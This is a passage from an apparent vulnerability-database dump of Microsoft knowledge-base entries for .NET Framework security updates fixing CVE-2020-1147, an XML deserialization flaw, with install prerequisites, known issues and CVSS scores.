Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6\n\n**IMPORTANT **Verify thatyou have installed the required updates listed in the **How to get this update** section _before_ installing this update.\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as _non-compliant_ in your patch management and compliance toolsets.\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of this OS must follow the procedures in KB4522133 to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://docs.microsoft.com/{lang-locale}/lifecycle/faq/extended-security-updates>).\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see [KB 4019990](<https://support.microsoft.com/en-us/help/4019990>).\n\n**IMPORTANT** If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <https://go.microsoft.com/fwlink/?linkid=2132227>.To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).\n\n * [CVE-2020-1147](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1147>)\n\n## Known issues in some parts of this update\n\n**Symptom**| After you apply this update, some applications experience a **TypeInitializationException** exception when they try to deserialize **System.Data.DataSet** or **System.Data.DataTable** instances from the XML within a SQL CLR stored procedure. The stack trace for this exception appears as follows:System.TypeInitializationException: The type initializer for 'Scope' threw an exception. ---&gt; System.IO.FileNotFoundException: Could not load file or assembly 'System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one of its dependencies. The system cannot find the file specified. \nat System.Data.TypeLimiter.Scope.IsTypeUnconditionallyAllowed(Type type) \nat System.Data.TypeLimiter.Scope.IsAllowedType(Type type) \nat System.Data.TypeLimiter.EnsureTypeIsAllowed(Type type, TypeLimiter capturedLimiter) \n---|--- \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update. \n**Symptom**| This update does not install, and it returns either or both of the following error messages:\n\n * -2146762495\n * A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.\n * The revocation function was unable to check revocation because the revocation server was offline. \n**Workaround**| This issue was corrected by the latest release of the affected parts in this update.If you've already installed a previous release of the affected parts, no action is required. \n \n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4565578](<https://support.microsoft.com/help/4565578>) Description of the Security Only Update for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4565578)\n * [4565583](<https://support.microsoft.com/help/4565583>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565583)\n * [4565586](<https://support.microsoft.com/help/4565586>) Description of the Security Only Update for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565586)\n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4566469)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T07:00:00", "id": "KB4566469", "href": "https://support.microsoft.com/en-us/help/4566469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:29:38", "description": "None\n**Applies to:**Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 \n\n## Summary\n\nA remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <https://go.microsoft.com/fwlink/?linkid=2132227>. To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-1147](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-1147>)\n** Important **\n\n * As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see [Microsoft .NET Framework 3.5 Deployment Considerations.](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations >)\n * All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## Known Issues\n\n**Symptoms:**After you apply this update, some applications experience a **TypeInitializationException** exception when they try to deserialize **System.Data.DataSet** or **System.Data.DataTable** instances from the XML within a SQL CLR stored procedure. The stack trace for this exception appears as follows:System.TypeInitializationException: The type initializer for 'Scope' threw an exception. ---&gt; System.IO.FileNotFoundException: Could not load file or assembly 'System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' or one of its dependencies. The system cannot find the file specified. \nat System.Data.TypeLimiter.Scope.IsTypeUnconditionallyAllowed(Type type) \nat System.Data.TypeLimiter.Scope.IsAllowedType(Type type) \nat System.Data.TypeLimiter.EnsureTypeIsAllowed(Type type, TypeLimiter capturedLimiter)**Resolution:**Install the latest version of this update that was released on October 13th, 2020.\n\n## Additional information about this update\n\nThe following articles contain additional information about this update as it relates to individual product versions.\n\n * [4565580](<https://support.microsoft.com/help/4565580>) Description of the Security Only Update for .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 (KB4565580) \n * [4565581](<https://support.microsoft.com/help/4565581>) Description of the Security Only Update for .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2 (KB4565581) \n * [4565585](<https://support.microsoft.com/help/4565585>) Description of the Security Only Update for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1 and Windows Server 2012 R2 (KB4565585) \n * [4565588](<https://support.microsoft.com/help/4565588>) Description of the Security Only Update for .NET Framework 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4565588) \n\n## Information about protection and security\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-14T07:00:00", "type": "mskb", "title": "Security Only Update for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1 and Windows Server 2012 R2 (KB4566468)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T07:00:00", "id": "KB4566468", "href": "https://support.microsoft.com/en-us/help/4566468", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:35:28", "description": "<html><body><p>Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4566520)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 2.0 Microsoft .NET Framework 3.0 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 </p> </div> </div> </div> </div><h2>Notice</h2><p>On July 23, 2020, update KB4565616\u00a0v2 and KB4565623 v2\u00a0were\u00a0released to replace v1 of those updates for .NET Framework 4.5.2 and\u00a04.6 for Windows Server 2008 SP2. The v1 updates did not install for customers who had certain ESU configurations. \u00a0The v2 updates correct\u00a0the issue for customers who could not install the v1 updates. \u00a0</p><p><br/>If you have already installed\u00a0v1 of these updates, no action is necessary. \u00a0</p><p><br/>To obtain\u00a0v2\u00a0of these updates, see the \u201cHow to obtain and install the update\u201d section of the individual update\u00a0article.\u00a0 Links to each article are found in the \"<a bookmark-id=\"Additional information\" href=\"#Additional information\" managed-link=\"\">Additional information about this update section</a>\" of this article.</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p> <strong>IMPORTANT </strong>Verify that<strong></strong>you have installed the required updates listed in the <strong>How to get this update</strong> section <u>before</u> installing this update. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p> <strong>IMPORTANT</strong> WSUS scan cab files will continue to be available for Windows Server 2008 SP2. If you have a subset of devices running this operating system without ESU, they might show as <u>non-compliant</u> in your patch management and compliance toolsets. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p> <strong>IMPORTANT</strong> Customers who have purchased the <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/cloud-platform/extended-security-updates\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Extended Security Update (ESU)</a> for on-premises versions of this OS must follow the procedures in <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4522133\" data-content-type=\"article\" href=\"https://support.microsoft.com/en-us/help/4522133\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">KB4522133</a> to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" data-content-id=\"4497181\" data-content-type=\"article\" href=\"https://support.microsoft.com/en-us/help/4497181\" managed-link=\"\" tabindex=\"0\">KB4497181</a>. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 SP2 require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see <span><span><a href=\"https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update\">KB 4474419</a>. </span></span></p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> All updates for .NET Framework 4.7.2, 4.7.1, 4.7, 4.6.2, 4.6.1, and 4.6 require that the d3dcompiler_47.dll update is installed. We recommend that you install the included d3dcompiler_47.dll update before you apply this update. For more information about the d3dcompiler_47.dll, see <a href=\"https://support.microsoft.com/en-us/help/4019990\">KB 4019990</a>. </p> </div> </div><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p align=\"LEFT\" dir=\"LTR\"> <strong>IMPORTANT</strong> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </p> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><h2>Additional information about this update</h2><div><span><a id=\"Additional information\" name=\"Additional information\"></a>The following articles contain additional information about this update as it relates to individual product versions.</span></div><div>\u00a0</div><ul><li><span> <a href=\"https://support.microsoft.com/help/4565611\" managed-link=\"\">4565611</a> <span>Description of the Security and Quality Rollup for .NET Framework 2.0, 3.0 for Windows Server 2008 SP2 (KB4565611)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4565616\" managed-link=\"\">4565616</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565616)</span> </span></li><li><span> <a href=\"https://support.microsoft.com/help/4565623\" managed-link=\"\">4565623</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6 for Windows 7 SP1 and Windows Server 2008 R2 SP1 and Windows Server 2008 SP2 (KB4565623)</span> </span></li></ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-23T21:01:51", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 2.0, 3.0, 4.5.2, 4.6 for Windows Server 2008 SP2 (KB4566520)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-23T21:01:51", "id": "KB4566520", "href": "https://support.microsoft.com/en-us/help/4566520/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T22:36:40", "description": "<html><body><p>Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4566519)</p><h2></h2><div class=\"alert-band\"> <div class=\"alert alert-info\" role=\"alert\"> <p class=\"alert-title\">Applies to:</p> <div class=\"row\"> <div class=\"col-xs-24\"> <p>Microsoft .NET Framework 3.5 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8 </p> </div> </div> </div> </div><h2>Summary</h2><p> A remote code execution vulnerability exists in .NET Framework when the software fails to check the source markup of XML file input. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the process responsible for deserialization of the XML content. To exploit this vulnerability, an attacker could upload a specially crafted document to a server utilizing an affected product to process content. The security update addresses the vulnerability by correcting how .NET Framework validates the source markup of XML content. </p><p> This security update affects how .NET Framework's System.Data.DataTable and System.Data.DataSet types read XML-serialized data. Most .NET Framework applications will not experience any behavioral change after the update is installed. For more information on how the update affects .NET Framework, including examples of scenarios which may be affected, please see the DataTable and DataSet security guidance document at <a href=\"https://go.microsoft.com/fwlink/?linkid=2132227\" id=\"2132227\" target=\"_self\">https://go.microsoft.com/fwlink/?linkid=2132227</a>. </p><p> To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). </p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147\" id=\"kb-link-2\" target=\"_self\">CVE-2020-1147</a></li></ul><p> <strong> <span class=\"text-base\">Important</span> </strong> </p><ul> <li> <span>As a reminder to advanced IT administrators, updates to .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2 should only be applied on systems where .NET Framework 3.5 is present and enabled. Customers who attempt to pre-install updates to .NET Framework 3.5 to offline images that do not contain the .NET Framework 3.5 product enabled will expose these systems to failures to enable .NET Framework 3.5 after the systems are online. For more extensive information about deploying .NET Framework 3.5, see </span> <a href=\"https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/microsoft-net-framework-35-deployment-considerations \">Microsoft .NET Framework 3.5 Deployment Considerations.</a> </li> <li> All updates for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2 require that update KB 2919355 is installed. We recommend that you install update KB 2919355 on your Windows 8.1-based, Windows RT 8.1-based, or Windows Server 2012 R2-based computer so that you receive updates in the future. </li> <li> If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/hh825699\" managed-link=\"\" target=\"_blank\">Add language packs to Windows</a>. </li> </ul><h2>Additional information about this update</h2><div> <span>The following articles contain additional information about this update as it relates to individual product versions.</span> </div><div></div><ul> <li> <span> <a href=\"https://support.microsoft.com/help/4565613\" managed-link=\"\">4565613</a> <span>Description of the Security and Quality Rollup for .NET Framework 3.5 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4565613)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565614\" managed-link=\"\">4565614</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.5.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4565614)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565622\" managed-link=\"\">4565622</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4565622)</span> </span> </li> <li> <span> <a href=\"https://support.microsoft.com/help/4565635\" managed-link=\"\">4565635</a> <span>Description of the Security and Quality Rollup for .NET Framework 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4565635)</span> </span> </li> </ul><h2>Information about protection and security</h2><ul> <li> Protect yourself online: <a href=\"https://support.microsoft.com/hub/4099151/windows-security-help\" originalsrc=\"https://support.microsoft.com/hub/4099151/windows-security-help\" shash=\"RYy3LeXx+rmimVtQWgsOp2FdFIqw7JA//Q/gQk82okgjOsd4xXdoK0JeBzlEcm0ODcghLacwCQ7rq/te5MIy9rhRyjOI5z+tQLQ58N0ohXStVASL9xwW0nm7tWELhl8Vd+jYkRf314nXnEXaofpGgPwiR8IWSM1V+w57ooqQzME=\" target=\"_blank\">Windows Security support</a></li> <li> Learn how we guard against cyber threats: <a href=\"https://www.microsoft.com/security\" originalsrc=\"https://www.microsoft.com/security\" shash=\"Fb+Q8jcsMznGoXBaEpy7ItSNVM/ojkQHBsLDm3A6U1j8nU/EzgwX89Ox/pQeEuCbTUAIMz1KtFkOsv9oQSp0WSip1uNUHotfXevDx7dDk5kFn4u/io4q1ESXpDplQ989sCEmxdzRlhaLF3PHKXMoLlTmwS5dmeU5gGxfXDhL40w=\">Microsoft Security</a></li> </ul></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-14T16:57:25", "type": "mskb", "title": "Security and Quality Rollup for .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Windows 8.1, RT 8.1, and Windows Server 2012 R2 (KB4566519)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1147"], "modified": "2020-07-14T16:57:25", "id": "KB4566519", "href": "https://support.microsoft.com/en-us/help/4566519/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-24T11:29:38", "description": "None\n## Notice\n\n**Revised 6/8/2021** On June 8th, 2021, this update was released to replace a previous update to address a \u201crevocation server was offline\u201d error that may occur during installation. If you've already installed a previous release of this update, no action is required. To obtain the latest version of these updates, see the \"How to obtain and install the update\" section of the individual update article. Links to each article are found in the \"Additional information about this update\" section of this article. On April 13th, 2021, this update was released to replace a previous release of this update.On October 13th, 2020 we are republishing this update to resolve a known issue that affected the original release. You should install this version (V3) of the update as part of your normal security routine.On July 23, 2020, update KB4565583 v2, KB4565586 v2, and KB4565589 v2 were released to replace v1 of those updates for .NET Framework 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, and 4.8 for Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1. The v1 updates did not install for customers who had certain ESU configurations. The v2 updates correct the issue for customers who could not install the v1 updates. \n\n**Applies to:**Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.7.1 Microsoft .NET Framework 4.7.2 Microsoft .NET Framework 4.8\n\n**IMPORTANT** Verify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n\n**IMPORTANT **Some customers who use Windows Server 2008 R2 SP1 and have activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on the affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU/t_blank>) post.\n\n**IMPORTANT** WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your patch management and compliance toolsets.\n\n**IMPORTANT** Customers who have purchased the [Extended Security Update (ESU)](<https://www.microsoft.com/en-us/cloud-platform/extended-security-updates>) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/en-us/help/4522133/procedure-to-continue-receiving-security-updates>) to continue receiving security updates after extended support ends on January 14, 2020. For more information on ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n\n**IMPORTANT** Starting on January 15, 2020, a full-screen notification will appear that describes the risk of continuing to use Windows 7 Service Pack 1 after it reaches end of support on January 14, 2020. The notification will remain on the screen until you interact with it. This notification will only appear on the following editions of Windows 7 Service Pack 1:**Note **The notification will not appear on domain-joined machines or machines in kiosk mode.\n\n * Starter.\n * Home Basic.\n * Home Premium.\n * Professional. If you have purchased the Extended Security Update (ESU), the notification will not appear. For more information, see [How to get Extended Security Updates for eligible Windows devices](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/archived-how-to-get-extended-security-updates-for-eligible/ba-p/917807>) and [Lifecycle FAQ-Extended Security Updates](<https://support.microsoft.com/en-us/help/4497181/lifecycle-faq-extended-security-updates>).\n * Ultimate.\n\n**IMPORTANT** Starting in August, 2019, updates to .NET Framework 4.6 and above, for Windows Server 2008 R2 SP1, and Windows 7SP1, require SHA-2 Code signing support. Please make sure that you have all the latest Windows Updates before applying this update to avoid installation issues. For more detailed information about SHA-2 code signing support updates, please see [KB 4474419](<https://support.microsoft.com/en-us/help/4474419/sha-2-code-signing-support-update>).\n\n**IMPORTANT** All updates for .NET Framework 4.7.2, 